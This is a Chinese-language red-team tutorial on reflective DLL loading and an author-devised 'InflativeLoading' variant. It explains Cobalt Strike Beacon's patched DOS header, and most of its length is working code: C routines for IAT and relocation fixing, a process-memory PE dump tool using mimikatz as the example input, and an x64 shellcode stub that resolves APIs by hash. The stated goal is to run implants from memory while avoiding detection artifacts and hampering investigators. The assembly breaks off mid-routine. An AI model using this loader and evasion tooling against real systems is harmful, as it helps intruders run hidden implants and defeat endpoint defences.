ReflectiveLoading And InflativeLoading

CobaltStrike 的 Beacon，实际上是一个 DLL。Shellcode 形式的 Beacon，是补丁后的 DLL 文件。通过巧妙的补丁，Beacon 可以实现像 Shellcode 一般的位置独立。我们分别生成 DLL 与 RAW 格式的载荷，进行对比：

DLL 格式的 Beacon，符合典型的 PE 文件格式。

对于 Shellcode 格式的 Beacon，我们发现其实际上是个补丁后的 DLL 文件，因为其格式符合 PE 格式标准

我们甚至能解析出导出函数 ReflectiveLoader。

那么，补丁了哪些地方呢？我们仔细对比一下这 2 个文件的 DOS 头，我们会发现 Shellcode 格式的 Beacon(右边) 虽然大体上符合 PE 格式标准，但 DOS 头是补丁过的。

对于 PE 文件，因为 DOS 头并非代码区，所以并不该被解析成机器码执行。因此 DLL 文件的 DOS 头如果被强行解释成汇编指令，代码看起来没有什么实际意义。而右图的 DOS 头被补丁成了精心设计的代码，我们来解读一下：

4D 5A					pop r10				# PE Magic Bytes，同时与下面的指令共同平衡栈	
41 52					push r10			# 平衡栈 						
55 						push rbp			# 设置栈帧
48 89 E5 				mov rbp, rsp		
48 81 EC 20 00 00 00 	sub rsp,0x20		
48 8D 1D EA FF FF FF 	lea rbx, [rip-0x16]	# 前移0x16字节从而获得Shellcode地址
48 89 DF 				mov rdi,rbx			
48 81 C3 F4 5F 01 00 	add rbx, 0x15ff4	# 通过硬编码偏移调用ReflectiveLoader导出函数
FF D3 					call rbx
41 B8 F0 B5 A2 56 		mov r8d,0x56a2b5f0	# 调用 DllMain函数
68 04 00 00 00 			push 4
5A 						pop rdx
48 89 F9 				mov rcx, rdi
FF D0 					call rax

我们来查看一下硬编码的偏移 0x15ff4，对应的 RVA 是 0x16bf4，确实正好是导出函数 ReflectiveLoader 的地址。

简单来说，通过补丁 DOS 头，使其成为具有实际意义的 Shellcode 头，实现当 Shellcode 被加载后，执行流程跳转到 ReflectiveLoader 导出函数，最后再执行 DllMain 函数。这样，可以将 DLL 转换为位置独立的 Shellcode。

反射式加载

那么，ReflectiveLoader 函数充当了什么作用？为什么在 DLL 被加载之前，这个导出函数就可以被执行了呢？在回答这些问题之前，我们需要知道 Windows DLL 加载器负责将存在于磁盘中的 DLL 加载到进程的虚拟内存空间。如果用于攻防模拟，Windows DLL 加载器存在着这些缺点：

DLL 必须存在于磁盘

DLL 不可被混淆

DLL 的加载会触发内核回调

所以，直接用 Windows DLL 加载器加载 DLL Beacon 不是最理想的，但如果我们能从内存中加载 Beacon DLL 呢？这么一个概念被称为反射式加载，被 Stephen Fewer 提出并实现(https://github.com/stephenfewer/ReflectiveDLLInjection)。反射式加载可以带来以下优势：

DLL 不必存在于磁盘，避免文件特征

避免映像文件加载触发的内核回调

我们的DLL 不会被 PEB 罗列

反射式加载即直接从内存中加载 DLL，与传统的 Windows DLL 加载都是将原始文件转换为在进程的虚拟内存中的格式。我们之前得知，当 PE 文件存在于磁盘和内存中时，因为对齐系数的不同，尺寸、原始文件偏移与RVA的映射关系会略有变化，一般来说在内存中会显得更加膨胀，在磁盘中时更加紧凑。

我们知道，PE 文件有着偏好加载地址，尽管实际被加载时，基址不一定与偏好加载地址相同。在 PE 文件中，有一些全局变量的地址是硬编码的(这些数据的地址由重定向表追踪)，那么自然也会随着实际加载地址的变化而变化。此外，IAT 表中的条目也会被更新，等等。平时，是由 Windows DLL 加载器帮我们完成了这些，但如果要实现反射式加载，这些任务就落在了我们头上。那么，实现反射式加载有这些步骤：

通过诸如 CreateRemoteThread 直接执行导出函数 ReflectiveLoader，或者像 CobaltStrike 一样补丁 DLL 的 DOS 头使其成为 Shellcode 头，跳转到 ReflectiveLoader。

ReflectiveLoader 函数计算出 DLL 的基址，通过不断前移，直到遇到 MZ，即 Magic Bytes。

通过 PEB walking 的方法得到 Kernel32 模块以及一些必要的 API 例如 LoadLibrary，GetProcAddress，VirtualAlloc 的地址。因为 ReflectiveLoader 函数在 DLL 被加载前就被调用了，所以需要位置独立，即不能使用全局变量以及直接调用 API。

使用 VirtualAlloc 分配内存空间，用于盛放映射后的 DLL

将 DLL 的各个头以及节复制到分配的内存空间，以及为不同区域设置对应的内存权限

修复 IAT 表。遍历每个导入的 DLL，对于每个 DLL，遍历每个导入函数。根据函数的导入方式(函数序数或名称)，补丁导入函数的地址。

修复重定向表。方法为计算出实际基址与偏好地址的差值，然后对于每个硬编码的地址都应用上这个差值。

调用 DllMain 入口函数，DLL 被成功加载至内存中。

如果是通过 Shellcode 头跳转的，那么 ReflectiveLoader 函数调用结束后会返回 Shellcode 头。如果是通过 CreateRemoteThread 调用的，那么线程会结束。

具体的代码实现，可以参考原始项目(https://github.com/stephenfewer/ReflectiveDLLInjection/blob/master/dll/src/ReflectiveLoader.c)

在 PE 小节，我们讲过了导入导出过程，关于重定向表的修复，我们以案例来学习一下：

calc 的偏好地址为 0x140000000。

calc 有 2 个重定向块，分别有 12 和 2 个条目。

Page RVA 与 Block Size 分别占 4 个字节，总计 8 个。从第 9 个字节开始，每个条目占用 2 个字节。因此，每个重定向块的尺寸为 8+2*条目数量，这里是 32 = 8 + 12*2。

每个条目中的 WORD 值，我们可以提取出其与页的偏移值，加上页的 RVA，我们就可以得到硬编码地址的 RVA。我们选择一个硬编码的地址，该地址处于 0x2000 的 RVA 处，值为 0x140003060，相对于偏好地址的偏移值为 0x3060。

在 WinDBG 中，当 calc 存在于内存空间时，我们会发现该地址被修复了：

不过这个地址与映像基址的相对偏移依旧是 0x3060。

尽管提供了反射式加载原始项目的代码，但我们再以 Maldev 中的代码来回顾一下一些重难点步骤：

复制各个节：

PBYTE			pPeBaseAddress			= NULL;

if ((pPeBaseAddress = VirtualAlloc(NULL, pPeHdrs->pImgNtHdrs->OptionalHeader.SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)) == NULL) {
	PRINT_WINAPI_ERR("VirtualAlloc");
	return FALSE;
}

for (int i = 0; i < pPeHdrs->pImgNtHdrs->FileHeader.NumberOfSections; i++) {
	memcpy(
		(PVOID)(pPeBaseAddress + pPeHdrs->pImgSecHdr[i].VirtualAddress),			// Distination: pPeBaseAddress + RVA
		(PVOID)(pPeHdrs->pFileBuffer + pPeHdrs->pImgSecHdr[i].PointerToRawData),		// Source: pPeHdrs->pFileBuffer + RVA
		pPeHdrs->pImgSecHdr[i].SizeOfRawData							// Size
	);
}

修复重定向表：

BOOL FixReloc(IN PIMAGE_DATA_DIRECTORY pEntryBaseRelocDataDir, IN ULONG_PTR pPeBaseAddress, IN ULONG_PTR pPreferableAddress) {

    // Pointer to the beginning of the base relocation block.
    PIMAGE_BASE_RELOCATION pImgBaseRelocation = (pPeBaseAddress + pEntryBaseRelocDataDir->VirtualAddress);

    // The difference between the current PE image base address and its preferable base address.
    ULONG_PTR uDeltaOffset = pPeBaseAddress - pPreferableAddress;

    // Pointer to individual base relocation entries.
    PBASE_RELOCATION_ENTRY pBaseRelocEntry = NULL;

    // Iterate through all the base relocation blocks.
    while (pImgBaseRelocation->VirtualAddress) {

        // Pointer to the first relocation entry in the current block.
        pBaseRelocEntry = (PBASE_RELOCATION_ENTRY)(pImgBaseRelocation + 1);

        // Iterate through all the relocation entries in the current block.
        while ((PBYTE)pBaseRelocEntry != (PBYTE)pImgBaseRelocation + pImgBaseRelocation->SizeOfBlock) {
            // Process the relocation entry based on its type.
            switch (pBaseRelocEntry->Type) {
	            case IMAGE_REL_BASED_DIR64:
	                // Adjust a 64-bit field by the delta offset.
	                *((ULONG_PTR*)(pPeBaseAddress + pImgBaseRelocation->VirtualAddress + pBaseRelocEntry->Offset)) += uDeltaOffset;
	                break;
	            case IMAGE_REL_BASED_HIGHLOW:
	                // Adjust a 32-bit field by the delta offset.
	                *((DWORD*)(pPeBaseAddress + pImgBaseRelocation->VirtualAddress + pBaseRelocEntry->Offset)) += (DWORD)uDeltaOffset;
	                break;
	            case IMAGE_REL_BASED_HIGH:
	                // Adjust the high 16 bits of a 32-bit field.
	                *((WORD*)(pPeBaseAddress + pImgBaseRelocation->VirtualAddress + pBaseRelocEntry->Offset)) += HIWORD(uDeltaOffset);
	                break;
	            case IMAGE_REL_BASED_LOW:
	                // Adjust the low 16 bits of a 32-bit field.
	                *((WORD*)(pPeBaseAddress + pImgBaseRelocation->VirtualAddress + pBaseRelocEntry->Offset)) += LOWORD(uDeltaOffset);
	                break;
	            case IMAGE_REL_BASED_ABSOLUTE:
	                // No relocation is required.
	                break;
	            default:
	                // Handle unknown relocation types.
	                printf("[!] Unknown relocation type: %d | Offset: 0x%08X \n", pBaseRelocEntry->Type, pBaseRelocEntry->Offset);
	                return FALSE;
            }
            // Move to the next relocation entry.
            pBaseRelocEntry++;
        }

        // Move to the next relocation block.
        pImgBaseRelocation = (PIMAGE_BASE_RELOCATION)pBaseRelocEntry;
    }

    return TRUE;
}

修复 IAT 表：

BOOL FixImportAddressTable(IN PIMAGE_DATA_DIRECTORY pEntryImportDataDir, IN PBYTE pPeBaseAddress) {

	// Pointer to an import descriptor for a DLL
	PIMAGE_IMPORT_DESCRIPTOR	pImgDescriptor		= NULL;
 	// Iterate over the import descriptors
	for (SIZE_T i = 0; i < pEntryImportDataDir->Size; i += sizeof(IMAGE_IMPORT_DESCRIPTOR)) {
		// Get the current import descriptor
		pImgDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(pPeBaseAddress + pEntryImportDataDir->VirtualAddress + i);
		// If both thunks are NULL, we've reached the end of the import descriptors list
		if (pImgDescriptor->OriginalFirstThunk == NULL && pImgDescriptor->FirstThunk == NULL)
			break;

		// Retrieve information from the current import descriptor
		LPSTR		cDllName                        = (LPSTR)(pPeBaseAddress + pImgDescriptor->Name);
		ULONG_PTR	uOriginalFirstThunkRVA          = pImgDescriptor->OriginalFirstThunk;
		ULONG_PTR	uFirstThunkRVA                  = pImgDescriptor->FirstThunk;
		SIZE_T		ImgThunkSize                    = 0x00;	// Used to move to the next function (iterating through the IAT and INT)
		HMODULE		hModule                         = NULL;

		// Try to load the DLL referenced by the current import descriptor
		if (!(hModule = LoadLibraryA(cDllName))) {
			PRINT_WINAPI_ERR("LoadLibraryA");
			return FALSE;
		}

		// Iterate over the imported functions for the current DLL
		while (TRUE) {
			
			// Get pointers to the first thunk and original first thunk data
			PIMAGE_THUNK_DATA               pOriginalFirstThunk     = (PIMAGE_THUNK_DATA)(pPeBaseAddress + uOriginalFirstThunkRVA + ImgThunkSize);
			PIMAGE_THUNK_DATA               pFirstThunk             = (PIMAGE_THUNK_DATA)(pPeBaseAddress + uFirstThunkRVA + ImgThunkSize);
			PIMAGE_IMPORT_BY_NAME           pImgImportByName        = NULL;
			ULONG_PTR                       pFuncAddress            = NULL;

			// At this point both 'pOriginalFirstThunk' & 'pFirstThunk' will have the same values
			// However, to populate the IAT (pFirstThunk), one should use the INT (pOriginalFirstThunk) to retrieve the 
			// functions addresses and patch the IAT (pFirstThunk->u1.Function) with the retrieved address.
			if (pOriginalFirstThunk->u1.Function == NULL && pFirstThunk->u1.Function == NULL) {
				break;
			}

			// If the ordinal flag is set, import the function by its ordinal number
			if (IMAGE_SNAP_BY_ORDINAL(pOriginalFirstThunk->u1.Ordinal)) {
				if ( !(pFuncAddress = (ULONG_PTR)GetProcAddress(hModule, IMAGE_ORDINAL(pOriginalFirstThunk->u1.Ordinal))) ) {
					printf("[!] Could Not Import !%s#%d \n", cDllName, (int)pOriginalFirstThunk->u1.Ordinal);
					return FALSE;
				}
			}
			// Import function by name
			else {
				pImgImportByName = (PIMAGE_IMPORT_BY_NAME)(pPeBaseAddress + pOriginalFirstThunk->u1.AddressOfData);
				if ( !(pFuncAddress = (ULONG_PTR)GetProcAddress(hModule, pImgImportByName->Name)) ) {
					printf("[!] Could Not Import !%s.%s \n", cDllName, pImgImportByName->Name);
					return FALSE;
				}
			}

			// Install the function address in the IAT
			pFirstThunk->u1.Function = (ULONGLONG)pFuncAddress;

			// Move to the next function in the IAT/INT array
			ImgThunkSize += sizeof(IMAGE_THUNK_DATA);
		}
	}

	return TRUE;
}

实际上，对于更加复杂的 PE 文件，我们可能还要处理异常表、TLS 回调表、函数参数等，请大家查询相关资料进行探索。

膨胀式加载

反射式加载实现了从内存中加载 DLL，有效地避免了一些 IOC。尽管如此，随着检测技术的升级，反射式加载其实也会留下一些显著的 IOC，我们来分析一下：

分配空间、修改值、复制节、更改权限等这一系列操作很嘈杂

分配 RWX 权限的内存空间是一个红线

从调用栈的角度来看，因为加载的 DLL 并非来源于磁盘，因此没有对应的符号，如下图所示，多个函数都没有对应的模块以及符号。该内存区域还是私有的，意味着很有可能是 Shellcode。这样的内存区域被称为漂浮代码，或者没有支持的内存区域(unbacked memory)。对这块内存区域进行调查，发现以 MZ 开头，那么就可以轻松地确认反射式加载地存在。

0:004> k
 # Child-SP          RetAddr               Call Site
00 0000009e`4b3afe58 00000245`d207208d     KERNEL32!SleepEx
01 0000009e`4b3afe60 00000245`d2073260     0x00000245`d207208d
02 0000009e`4b3afe68 00000245`d1cf5580     0x00000245`d2073260
03 0000009e`4b3afe70 00000245`cfdb5d10     0x00000245`d1cf5580
04 0000009e`4b3afe78 0000009e`4b3afe08     0x00000245`cfdb5d10
05 0000009e`4b3afe80 00000245`d2071000     0x0000009e`4b3afe08
06 0000009e`4b3afe88 00000245`d20722c0     0x00000245`d2071000
07 0000009e`4b3afe90 00000245`d2071000     0x00000245`d20722c0
08 0000009e`4b3afe98 00007ffb`c87f0000     0x00000245`d2071000
09 0000009e`4b3afea0 00000000`00000000     ucrtbase!parse_bcp47 <PERF> (ucrtbase+0x0)

关于第 3 点，延伸阅读可以参考该文章(https://www.elastic.co/security-labs/hunting-memory)。上图的案例，我是反射式加载了调用 SleepEx 的 PE 文件，用于方便观察调用栈。

除了 IOC，反射式加载也有一些不太便利的地方，例如需要将 Stephen Fewer 的反射式加载项目加入到我们的 DLL 项目中，对于不太方便获取源代码与编译的 DLL 有些捉襟见肘。此外，DLL 有着 ReflectiveLoader 的导出函数，如果没有对其进行稍加修改，那么也是一个 IOC。

因此，我提出了膨胀式加载(InflativeLoading)，旨在对反射式加载进行一定的优化，诚然，尽管没有解决反射式加载的所有的问题，例如第 3 点 IOC(可以解决部分)。要彻底解决第 3 点，我们需要配合其他技术，例如 Module Stomping(https://otterhacker.github.io/Malware/Module%20stomping.html) 技术。

膨胀式加载的思路是在 PE 文件前加入一个 0x1000字节(一张内存页的尺寸)的 Shellcode 头(实际代码后面随便添加数据填充到 0x1000 字节)，使该 PE 文件成为位置独立的 Shellcode，有些类似于 CobaltStrike Shellcode 格式 Beacon 的实现，但是不需要有特定导出函数，因此对于不太方便获取源码与编译的 PE 文件有了更大的友好。

需要注意的是，这里所说的 PE 文件实际上不是原始 PE 文件，而是其在内存中的转储。为什么要这么做呢，之前说了，PE 文件在内存与磁盘中时，尺寸会有所不同，尤其是对于加过壳的程序。在反射式加载中，我们是直接一个节一个节复制到分配的内存空间中的，尽管大多数情况下这是没什么问题的，但在特定情况下，尺寸的差异可能会带来非预期的结果。此外，从内存中导出可以不用进行原始文件偏移与 RVA 的相互转换了，带来计算上的便利。并且，我们也不需要调用 VirtualAlloc 来分配新的内存空间了，因为转储文件就是该 PE 文件在内存中的形式，只是我们依旧需要修复一些数据，例如 IAT 表。

该 Shellcode 头会通过 PEB walking 来获得所需模块以及函数的地址，通过偏移获得 PE 文件的起始地址，修复 IAT 表，修复重定向表，修复延迟导入表等。因为修复 IAT 表等操作需要对数据进行更新，因此 PE 文件的一些节需要 RW 权限，而 .text 节需要 RX 权限。我们一开始可以先给整个 Shellcode 分配 RW 权限，然后变更 Shellcode 头与 .text 节区域的权限为 RX，这样可以保证整个 Shellcode 执行无问题。

至于 unbacked memory 的问题，尽管在没有 module stomping 技术的结合下，尚未彻底解决，但是我们避免了 RWX 权限的内存区域，并且 RX 权限的区域并不以 MZ 这个 Magic Bytes 开头，一定程度上加大了调查的难度。

简单总结一下，膨胀式加载相比反射式加载有如下优势：

不需要特定导出函数，对不方便获取源码与编译的 PE 文件更友好

避免因为 PE 文件在磁盘和内存中的差异导致非预期结果

无需进行原始文件偏移与 RVA 的转换

避免了额外的内存空间分配

避免了 RWX 内存区域

即便是 RX 内存区域，也不以 MZ 特征开头，加大了调查难度

那么，怎么用代码实现呢？首先，我们需要得到 PE 文件在内存中的转储，这个很容易实现：

#include <Windows.h>
#include <stdio.h>
#include <winternl.h>


#pragma comment(lib, "ntdll.lib")
#pragma warning(disable:4996)

EXTERN_C NTSTATUS NTAPI NtQueryInformationProcess(
	HANDLE ProcessHandle,
	PROCESSINFOCLASS ProcessInformationClass,
	PVOID ProcessInformation,
	ULONG ProcessInformationLength,
	PULONG ReturnLength
);


BOOL ReadPEFile(LPCSTR lpFileName, PBYTE* pPe, SIZE_T* sPe) {

	HANDLE	hFile = INVALID_HANDLE_VALUE;
	PBYTE	pBuff = NULL;
	DWORD	dwFileSize = NULL,
		dwNumberOfBytesRead = NULL;

	hFile = CreateFileA(lpFileName, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if (hFile == INVALID_HANDLE_VALUE) {
		printf("[!] CreateFileA Failed With Error : %d \n", GetLastError());
		goto _EndOfFunction;
	}

	dwFileSize = GetFileSize(hFile, NULL);
	if (dwFileSize == NULL) {
		printf("[!] GetFileSize Failed With Error : %d \n", GetLastError());
		goto _EndOfFunction;
	}

	pBuff = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwFileSize);
	if (pBuff == NULL) {
		printf("[!] HeapAlloc Failed With Error : %d \n", GetLastError());
		goto _EndOfFunction;
	}

	if (!ReadFile(hFile, pBuff, dwFileSize, &dwNumberOfBytesRead, NULL) || dwFileSize != dwNumberOfBytesRead) {
		printf("[!] ReadFile Failed With Error : %d \n", GetLastError());
		printf("[!] Bytes Read : %d of : %d \n", dwNumberOfBytesRead, dwFileSize);
		goto _EndOfFunction;
	}

	printf("[+] DONE \n");


_EndOfFunction:
	*pPe = (PBYTE)pBuff;
	*sPe = (SIZE_T)dwFileSize;
	if (hFile)
		CloseHandle(hFile);
	if (*pPe == NULL || *sPe == NULL)
		return FALSE;
	return TRUE;
}



DWORD ParsePE(PBYTE pPE)
{
	DWORD size = 0;
	PIMAGE_DOS_HEADER pImgDosHdr = (PIMAGE_DOS_HEADER)pPE;
	if (pImgDosHdr->e_magic != IMAGE_DOS_SIGNATURE) {
		return -1;
	}

	PIMAGE_NT_HEADERS pImgNtHdrs = (PIMAGE_NT_HEADERS)(pPE + pImgDosHdr->e_lfanew);
	if (pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE) {
		return -1;
	}

	IMAGE_OPTIONAL_HEADER	ImgOptHdr = pImgNtHdrs->OptionalHeader;
	if (ImgOptHdr.Magic != IMAGE_NT_OPTIONAL_HDR_MAGIC) {
		return -1;
	}

	printf("[+] Size Of The Image : 0x%x \n", ImgOptHdr.SizeOfImage);
	size = ImgOptHdr.SizeOfImage;
	return size;
}





int main(int argc, char* argv[])
{
	PBYTE	pPE = NULL;
	SIZE_T	sPE = NULL;
	if (argc < 3)
	{
		printf("Usage: DumpPEFromMemoryMemory.exe <Native EXE> <Dump File>\nE.g. ReadPEInMemory.exe mimikatz.exe mimikatz.bin\n");
		return -1;
	}
	LPCSTR filename = argv[1];
	char* outputbin = argv[2];

	if (!ReadPEFile(filename, &pPE, &sPE)) {
		return -1;
	}

	DWORD size_of_image = ParsePE(pPE);
	HeapFree(GetProcessHeap(), NULL, pPE);

	STARTUPINFOA si;
	PROCESS_INFORMATION pi;
	ZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&pi, sizeof(pi));

	if (!CreateProcessA(filename, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {
		printf("CreateProcess failed (%d).\n", GetLastError());
		return 1;
	}
	printf("Process PID: %lu\n", pi.dwProcessId);
	PROCESS_BASIC_INFORMATION pbi;
	NTSTATUS status = NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL);

	if (status == 0) {
		printf("PEB Address:%p\n", pbi.PebBaseAddress);
		PVOID imageBaseAddress;
		SIZE_T bytesRead;

		ReadProcessMemory(pi.hProcess, (PCHAR)pbi.PebBaseAddress + sizeof(PVOID) * 2, &imageBaseAddress, sizeof(PVOID), &bytesRead);
		printf("Image Base Address:%p\n", imageBaseAddress);

		SIZE_T totalSize = size_of_image;	//Total size of PE image in memory
		const SIZE_T CHUNK_SIZE = 0xb000; // Chunk size for reading and writing
		BYTE buffer[0xb000];	//Number of bytes read each time


		SIZE_T totalBytesRead = 0;

		// Calculate the number of iterations needed
		int numIterations = (totalSize / CHUNK_SIZE) + (totalSize % CHUNK_SIZE ? 1 : 0);

		FILE* file = fopen(outputbin, "ab"); // Open file in append mode
		if (file == NULL) {
			printf("Failed to open %s for writing\n", outputbin);
			exit(1);
		}

		for (int iteration = 0; iteration < numIterations; iteration++) {
			BYTE buffer[CHUNK_SIZE];
			SIZE_T offset = iteration * CHUNK_SIZE;
			SIZE_T sizeToRead = min(CHUNK_SIZE, totalSize - offset);

			if (!ReadProcessMemory(pi.hProcess, (PBYTE)imageBaseAddress + offset, &buffer, sizeToRead, &bytesRead)) {
				printf("Error reading memory: %d\n", GetLastError());
				break;
			}

			fwrite(buffer, 1, bytesRead, file); 
			totalBytesRead += bytesRead;
		}

		fclose(file);
		printf("Data successfully written to %s. Total bytes read: 0x%x\n", outputbin, totalBytesRead);
	}
	else {
		printf("Error");
	}

	if (!TerminateProcess(pi.hProcess, 0)) {
		printf("TerminateProcess failed (%d).\n", GetLastError());
		return 1;
	}

	return 0;
}

注意，我们在自己的开发机上运行编译后的该程序，而非目标主机。该代码通过创建新进程来运行指定的程序，不过是挂起状态，为了避免运行的程序对我们的开发机造成紊乱。然后分次通过 ReadProcessMemory 读取主模块的整个内存空间，并写入本地文件，直到读取与保存完毕。

至于 Shellcode Stub，虽然我们可以用 C 编写 PIC 代码然后提取出 Shellcode，不过我们还是直接写汇编代码来加强理解。

1：获得模块与函数的地址

我们复用一下之前的 Shellcode：

"find_kernel32:"
" mov rsi,[rax+0x18];"			# RSI = Address of _PEB_LDR_DATA
" mov rsi,[rsi + 0x30];"		# RSI = Address of the InInitializationOrderModuleList
" mov r9, [rsi];"			
" mov r9, [r9];"			
" mov r9, [r9+0x10];"			# kernel32.dll
" jmp function_stub;"			# Jump to func call stub


"parse_module:"				# Parsing DLL file in memory
" mov ecx, dword ptr [r9 + 0x3c];"	# R9 = Base address of the module, ECX = NT header offset
" xor r15, r15;"
" mov r15b, 0x88;"			# Offset to Export Directory   
" add r15, r9;"				
" add r15, rcx;"			# R15 points to Export Directory
" mov r15d, dword ptr [r15];"		# R15 = RVA of export directory
" add r15, r9;"				# R15 = VA of export directory
" mov ecx, dword ptr [r15 + 0x18];"	# ECX = # of function names as an index value
" mov r14d, dword ptr [r15 + 0x20];"	# R14 = RVA of ENPT
" add r14, r9;"				# R14 = VA of ENPT


"search_function:"			# Search for a given function
" jrcxz not_found;"			# If RCX = 0, the given function is not found
" dec ecx;"				# Decrease index by 1
" xor rsi, rsi;"
" mov esi, [r14 + rcx*4];"		# RVA of function name
" add rsi, r9;"				# RSI points to function name string


"function_hashing:"			# Hash function name function
" xor rax, rax;"
" xor rdx, rdx;"
" cld;"					# Clear DF flag


"iteration:"				# Iterate over each byte
" lodsb;"				# Copy the next byte of RSI to Al
" test al, al;"				# If reaching the end of the string
" jz compare_hash;"			# Compare hash
" ror edx, 0x0d;"			# Part of hash algorithm
" add edx, eax;"			# Part of hash algorithm
" jmp iteration;"			# Next byte


"compare_hash:"				# Compare hash
" cmp edx, r8d;"			# R8 = Supplied function hash
" jnz search_function;"			# If not equal, search the previous function (index decreases)
" mov r10d, [r15 + 0x24];"		# Ordinal table RVA
" add r10, r9;"				# R10 = Ordinal table VMA
" movzx ecx, word ptr [r10 + 2*rcx];"	# Ordinal value -1
" mov r11d, [r15 + 0x1c];"		# RVA of EAT
" add r11, r9;"				# r11 = VA of EAT
" mov eax, [r11 + 4*rcx];"		# RAX = RVA of the function
" add rax, r9;"				# RAX = VA of the function
" ret;"
"not_found:"
" xor rax, rax;"			# Return zero
" ret;"


"function_stub:"			
" mov rbp, r9;"				# RBP stores base address of Kernel32.dll
" mov r8d, 0xec0e4e8e;"			# LoadLibraryA Hash
" call parse_module;"			# Search LoadLibraryA's address
" mov r12, rax;"			# R12 stores the address of LoadLibraryA function
" mov r8d, 0x7c0dfcaa;"			# GetProcAddress Hash
" call parse_module;"			# Search GetProcAddress's address
" mov r13, rax;"			# R13 stores the address of GetProcAddress function

2：获得 PE 文件的起始地址并为修复 IAT 表做准备

这里，我们没有硬编码偏移值，而是可以动态地计算出来。

" jmp fix_import_dir;"			# Jump to fix_import_dir section


"find_nt_header:"			# Quickly return NT header in RAX
" xor rax, rax;"
" mov eax, [rbx+0x3c];"   		# EAX contains e_lfanew
" add rax, rbx;"          		# RAX points to NT Header
" ret;"					


"fix_import_dir:"  			# Init necessary variable for fixing IAT
" xor rsi, rsi;"
" xor rdi, rdi;"
f"lea rbx, [rip+{CODE_OFFSET}];"	# Jump to the dump file
" call find_nt_header;"
" mov esi, [rax+0x90];"  		# ESI = ImportDir RVA
" add rsi, rbx;"         		# RSI points to ImportDir
" mov edi, [rax+0x94];"   		# EDI = ImportDir Size
" add rdi, rsi;"          		# RDI = ImportDir VA + Size

3：修复 IAT 表

这里有 2 层循环，外层循环是导入模块，内层循环是模块中的导入函数。

"loop_module:"
" cmp rsi, rdi;"          		# Compare current descriptor with the end of import directory
" je loop_end;"		    		# If equal, exit the loop
" xor rdx ,rdx;"
" mov edx, [rsi+0x10];"        		# EDX = IAT RVA (32-bit)
" test rdx, rdx;"         		# Check if ILT RVA is zero (end of descriptors)
" je loop_end;"		    		# If zero, exit the loop
" xor rcx, rcx;"
" mov ecx, [rsi+0xc];"    		# RCX = Module Name RVA
" add rcx, rbx;"          		# RCX points to Module Name
" call r12;"              		# Call LoadLibraryA
" xor rdx ,rdx;"			
" mov edx, [rsi+0x10];"        		# Restore IAT RVA
" add rdx, rbx;"          		# RDX points to IAT
" mov rcx, rax;"          		# Module handle for GetProcAddress
" mov r14, rdx;"			# Backup IAT Address


"loop_func:"
" mov rdx, r14;"			# Restore IAT address + processed entries
" mov rdx, [rdx];"        		# RDX = Ordinal or RVA of HintName Table
" test rdx, rdx;"         		# Check if it's the end of the IAT
" je next_module;"	    		# If zero, move to the next descriptor
" mov r9, 0x8000000000000000;"
" test rdx, r9;"  			# Check if it is import by ordinal (highest bit set)
" mov rbp, rcx;"			# Save module base address
" jnz resolve_by_ordinal;"		# If set, resolve by ordinal


"resolve_by_name:"
" add rdx, rbx;"          		# RDX = HintName Table VA
" add rdx, 2;"		  		# RDX points to Function Name
" call r13;"              		# Call GetProcAddress
" jmp update_iat;"        		# Go to update IAT


"resolve_by_ordinal:"
" mov r9, 0x7fffffffffffffff;"
" and rdx, r9;"			   	# RDX = Ordinal number
" call r13;"              		# Call GetProcAddress with ordinal


"update_iat:"
" mov rcx, rbp;"          		# Restore module base address
" mov rdx, r14;"				# Restore IAT Address + processed entries
" mov [rdx], rax;"         		# Write the resolved address to the IAT
" add r14, 0x8;"		  	# Movce to the next ILT entry
" jmp loop_func;"			# Repeat for the next function


"next_module:"
" add rsi, 0x14;"         		# Move to next import descriptor
" jmp loop_module;"  			# Continue loop


"loop_end:"

4：修复重定向表

小节前面已经教了大家修复重定向表的原理了。需要注意的是，有的重定向块的最后一个条目是空的。

"fix_basereloc_dir:"			# Save RBX //dq rbx+21b0 l46
" xor rsi, rsi;"
" xor rdi, rdi;"
" xor r8, r8;"				# Empty R8 to save page RVA
" xor r9, r9;"				# Empty R9 to place block size
" xor r15, r15;"
" call find_nt_header;"
" mov esi, [rax+0xb0];"  		# ESI = BaseReloc RVA
" add rsi, rbx;"         		# RSI points to BaseReloc
" mov edi, [rax+0xb4];"   		# EDI = BaseReloc Size
" add rdi, rsi;"          		# RDI = BaseReloc VA + Size
" mov r15d, [rax+0x28];"		# R15 = Entry point RVA
" add r15, rbx;"			# R15 = Entry point
" mov r14, [rax+0x30];"			# R14 = Preferred address
" sub r14, rbx;"			# R14 = Delta address 
" mov [rax+0x30], rbx;"			# Update Image Base Address
" mov r8d, [rsi];"			# R8 = First block page RVA
" add r8, rbx;"				# R8 points to first block page (Should add an offset later)
" mov r9d, [rsi+4];"			# First block's size
" xor rax, rax;"
" xor rcx, rcx;"


"loop_block:"
" cmp rsi, rdi;"          		# Compare current block with the end of BaseReloc
" jge basereloc_fixed_end;"    		# If equal, exit the loop
" xor r8, r8;"
" mov r8d, [rsi];"			# R8 = Current block's page RVA
" add r8, rbx;"				# R8 points to current block page (Should add an offset later)
" mov r11, r8;"				# Backup R8
" xor r9, r9;"
" mov r9d, [rsi+4];"			# R9 = Current block size
" add rsi, 8;"				# RSI points to the 1st entry, index for inner loop for all entries
" mov rdx, rsi;"
" add rdx, r9;"
" sub rdx, 8;"				# RDX = End of all entries in current block


"loop_entries:"
" cmp rsi, rdx;"			# If we reached the end of current block
" jz next_block;"			# Move to next block
" xor rax, rax;"
" mov ax, [rsi];"			# RAX = Current entry value
" test rax, rax;"			# If entry value is 0
" jz skip_padding_entry;"		# Reach the end of entry and the last entry is a padding entry
" mov r10, rax;"			# Copy entry value to R10
" and eax, 0xfff;"			# Offset, 12 bits
" add r8, rax;"				# Added an offset


"update_entry:"
" sub [r8], r14;"			# Update the address
" mov r8, r11;"				# Restore r8
" add rsi, 2;"				# Move to next entry by adding 2 bytes
" jmp loop_entries;"


